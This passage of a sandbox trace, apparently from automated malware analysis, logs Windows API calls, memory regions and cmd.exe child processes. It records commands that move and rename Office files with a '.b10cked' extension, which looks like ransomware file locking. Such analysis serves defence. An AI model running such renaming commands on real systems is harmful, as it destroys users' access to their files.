lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0161.742] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0161.742] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0161.742] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 
[0161.742] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0161.742] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0161.743] GetConsoleTitleW (in: lpConsoleTitle=0x2c0930, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0161.743] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0161.743] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0161.743] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0161.743] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0161.744] _wcsicmp (_String1="move", _String2=")") returned 68 [0161.744] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0161.744] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0161.744] _wcsicmp (_String1="IF", _String2="move") returned -4 [0161.744] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0161.744] _wcsicmp (_String1="REM", _String2="move") returned 5 [0161.744] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0161.748] GetConsoleTitleW (in: lpConsoleTitle=0x14f570, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0161.749] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0161.749] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0161.749] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0161.749] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0161.749] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0161.749] _wcsicmp (_String1="move", _String2="CD") returned 10 [0161.749] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0161.749] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0161.749] _wcsicmp (_String1="move", _String2="REN") returned -5 [0161.749] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0161.749] 
_wcsicmp (_String1="move", _String2="SET") returned -6 [0161.749] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0161.749] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0161.749] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0161.749] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0161.749] _wcsicmp (_String1="move", _String2="MD") returned 11 [0161.749] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0161.749] _wcsicmp (_String1="move", _String2="RD") returned -5 [0161.749] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0161.749] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0161.749] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0161.749] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0161.749] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0161.749] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0161.749] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0161.749] _wcsicmp (_String1="move", _String2="VER") returned -9 [0161.749] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0161.749] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0161.749] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0161.749] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0161.749] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0161.749] _wcsicmp (_String1="move", _String2="START") returned -6 [0161.749] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0161.749] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0161.750] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0161.757] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0161.757] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0161.757] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x14f32c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x14f324, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, 
lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x14f324*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0161.758] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0161.758] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0161.758] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0161.758] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0161.758] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0161.758] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0161.758] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0161.758] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0161.758] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0161.758] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0161.758] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0161.758] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0161.758] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0161.758] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0161.758] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0161.758] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0161.758] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0161.758] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0161.758] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0161.758] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) 
returned -13 [0161.758] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0161.758] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0161.758] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0161.758] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0161.759] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0161.759] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0161.759] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0161.759] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0161.759] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0161.759] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0161.759] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0161.759] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0161.759] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0161.759] _wcsicmp (_String1="WWINTL~2.TRX", _String2=".") returned 73 [0161.759] _wcsicmp (_String1="WWINTL~2.TRX", _String2="..") returned 73 [0161.759] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL~2.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\wwintl~2.trx")) returned 0x2020 [0161.760] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2d1f20 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0161.760] SetErrorMode (uMode=0x0) returned 0x0 [0161.760] SetErrorMode (uMode=0x1) returned 0x0 [0161.760] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL~2.TRX", nBufferLength=0x104, lpBuffer=0x14ecb4, lpFilePart=0x14ec9c | out: 
lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL~2.TRX", lpFilePart=0x14ec9c*="WWINTL~2.TRX") returned 0x3c [0161.760] SetErrorMode (uMode=0x0) returned 0x1 [0161.760] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036")) returned 0x2012 [0161.760] _wcsicmp (_String1="WWINTL~2.TRX", _String2=".") returned 73 [0161.760] _wcsicmp (_String1="WWINTL~2.TRX", _String2="..") returned 73 [0161.760] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL~2.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\wwintl~2.trx")) returned 0x2020 [0161.760] SetErrorMode (uMode=0x0) returned 0x0 [0161.760] SetErrorMode (uMode=0x1) returned 0x0 [0161.760] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL~2.TRX", nBufferLength=0x104, lpBuffer=0x14f130, lpFilePart=0x14eec8 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL~2.TRX", lpFilePart=0x14eec8*="WWINTL~2.TRX") returned 0x3c [0161.760] SetErrorMode (uMode=0x0) returned 0x1 [0161.760] SetErrorMode (uMode=0x0) returned 0x0 [0161.761] SetErrorMode (uMode=0x1) returned 0x0 [0161.761] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL.REST.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x14f338, lpFilePart=0x14eec8 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL.REST.trx_dll.b10cked", lpFilePart=0x14eec8*="WWINTL.REST.trx_dll.b10cked") returned 0x4b [0161.761] SetErrorMode (uMode=0x0) returned 0x1 [0161.761] SetLastError (dwErrCode=0x0) [0161.761] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL.REST.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\wwintl.rest.trx_dll.b10cked")) returned 0xffffffff [0161.761] GetLastError 
() returned 0x2 [0161.761] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL~2.TRX", fInfoLevelId=0x1, lpFindFileData=0x14e844, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14e844) returned 0x2d2130 [0161.761] FindNextFileW (in: hFindFile=0x2d2130, lpFindFileData=0x14e844 | out: lpFindFileData=0x14e844) returned 0 [0161.762] GetLastError () returned 0x12 [0161.762] FindClose (in: hFindFile=0x2d2130 | out: hFindFile=0x2d2130) returned 1 [0161.763] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL~2.TRX", fInfoLevelId=0x1, lpFindFileData=0x2d1cc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2d1cc0) returned 0x2d2130 [0161.763] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL.REST.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x14eadc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL.REST.trx_dll.b10cked", lpFilePart=0x0) returned 0x4b [0161.763] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL.REST.trx_dll", nBufferLength=0x104, lpBuffer=0x14eadc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL.REST.trx_dll", lpFilePart=0x0) returned 0x43 [0161.763] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL.REST.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\wwintl.rest.trx_dll")) returned 0x2020 [0161.763] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL.REST.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\wwintl.rest.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL.REST.trx_dll.b10cked" (normalized: 
"c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\wwintl.rest.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0161.764] FindClose (in: hFindFile=0x2d2130 | out: hFindFile=0x2d2130) returned 1 [0161.764] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x14ea90 | out: _Buffer=" 1") returned 9 [0161.764] _get_osfhandle (_FileHandle=1) returned 0x7 [0161.764] GetFileType (hFile=0x7) returned 0x2 [0161.764] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0161.764] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ea1c | out: lpMode=0x14ea1c) returned 1 [0161.765] _get_osfhandle (_FileHandle=1) returned 0x7 [0161.765] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x14ea50 | out: lpConsoleScreenBufferInfo=0x14ea50) returned 1 [0161.765] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0161.765] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x14ea90 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0161.765] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x14ea74, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x14ea74*=0x1a) returned 1 [0161.766] _get_osfhandle (_FileHandle=1) returned 0x7 [0161.766] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0161.766] _get_osfhandle (_FileHandle=1) returned 0x7 [0161.766] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0161.766] _get_osfhandle (_FileHandle=0) returned 0x3 [0161.766] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0161.766] SetConsoleInputExeNameW () returned 0x1 [0161.766] GetConsoleOutputCP () returned 0x1b5 [0161.766] 
GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0161.766] SetThreadUILanguage (LangId=0x0) returned 0x409 [0161.766] exit (_Code=0) Process: id = "276" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea168c0" os_pid = "0xd94" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL32.REST.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 22311 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 22312 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 22313 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 22314 start_va = 0xb0000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 22315 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 22316 start_va = 0x77230000 end_va = 0x7736bfff 
entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 22317 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 22318 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 22319 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 22320 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 22373 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 22374 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 22375 start_va = 0x1b0000 end_va = 0x216fff entry_point = 0x1b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 22376 start_va = 0x340000 end_va = 0x43ffff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 22377 start_va = 0x630000 end_va = 0x63ffff entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 22378 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 22379 start_va = 0x75540000 end_va = 0x75589fff entry_point 
= 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 22380 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 22381 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 22382 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 22383 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 22384 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 22385 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 22386 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 22387 start_va = 0x220000 end_va = 0x2e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000220000" filename = "" Region: id = 22388 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = 
"\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 22389 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 22390 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 22391 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 22392 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 22393 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 22394 start_va = 0x440000 end_va = 0x540fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 22395 start_va = 0x640000 end_va = 0x123ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000640000" filename = "" Region: id = 22396 start_va = 0x1240000 end_va = 0x13a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001240000" filename = "" Thread: id = 340 os_tid = 0xd58 [0162.340] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1af9b4 | out: lpSystemTimeAsFileTime=0x1af9b4*(dwLowDateTime=0x9a228800, dwHighDateTime=0x1d440a9)) [0162.340] GetCurrentProcessId () returned 0xd94 [0162.340] GetCurrentThreadId () returned 0xd58 [0162.341] GetTickCount () returned 0x31360 [0162.341] QueryPerformanceCounter (in: lpPerformanceCount=0x1af9ac | out: lpPerformanceCount=0x1af9ac*=21912976426) returned 1 [0162.341] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0162.341] __set_app_type (_Type=0x1) [0162.341] __p__fmode () returned 0x76b331f4 
[0162.341] __p__commode () returned 0x76b331fc [0162.341] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0162.342] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0162.342] GetCurrentThreadId () returned 0xd58 [0162.342] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xd58) returned 0x38 [0162.342] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0162.342] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0162.342] SetThreadUILanguage (LangId=0x0) returned 0x409 [0162.342] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0162.342] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1af944 | out: phkResult=0x1af944*=0x0) returned 0x2 [0162.342] VirtualQuery (in: lpAddress=0x1af97b, lpBuffer=0x1af914, dwLength=0x1c | out: lpBuffer=0x1af914*(BaseAddress=0x1af000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.342] VirtualQuery (in: lpAddress=0xb0000, lpBuffer=0x1af914, dwLength=0x1c | out: lpBuffer=0x1af914*(BaseAddress=0xb0000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0162.342] VirtualQuery (in: lpAddress=0xb1000, lpBuffer=0x1af914, dwLength=0x1c | out: lpBuffer=0x1af914*(BaseAddress=0xb1000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0162.342] VirtualQuery (in: lpAddress=0xb3000, lpBuffer=0x1af914, dwLength=0x1c | out: lpBuffer=0x1af914*(BaseAddress=0xb3000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0xfd000, 
State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.342] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x1af914, dwLength=0x1c | out: lpBuffer=0x1af914*(BaseAddress=0x1b0000, AllocationBase=0x1b0000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0162.342] GetConsoleOutputCP () returned 0x1b5 [0162.343] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0162.343] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0162.343] _get_osfhandle (_FileHandle=1) returned 0x7 [0162.343] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0162.343] _get_osfhandle (_FileHandle=1) returned 0x7 [0162.343] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0162.343] _get_osfhandle (_FileHandle=1) returned 0x7 [0162.343] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0162.343] _get_osfhandle (_FileHandle=0) returned 0x3 [0162.343] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0162.343] _get_osfhandle (_FileHandle=0) returned 0x3 [0162.344] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0162.344] GetEnvironmentStringsW () returned 0x350218* [0162.344] FreeEnvironmentStringsW (penv=0x350218) returned 1 [0162.344] GetEnvironmentStringsW () returned 0x350218* [0162.344] FreeEnvironmentStringsW (penv=0x350218) returned 1 [0162.344] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ae8b4 | out: phkResult=0x1ae8b4*=0x40) returned 0x0 [0162.344] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ae8bc, lpData=0x1ae8c0, lpcbData=0x1ae8b8*=0x1000 | out: lpType=0x1ae8bc*=0x0, lpData=0x1ae8c0*=0xa8, lpcbData=0x1ae8b8*=0x1000) returned 0x2 [0162.344] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", 
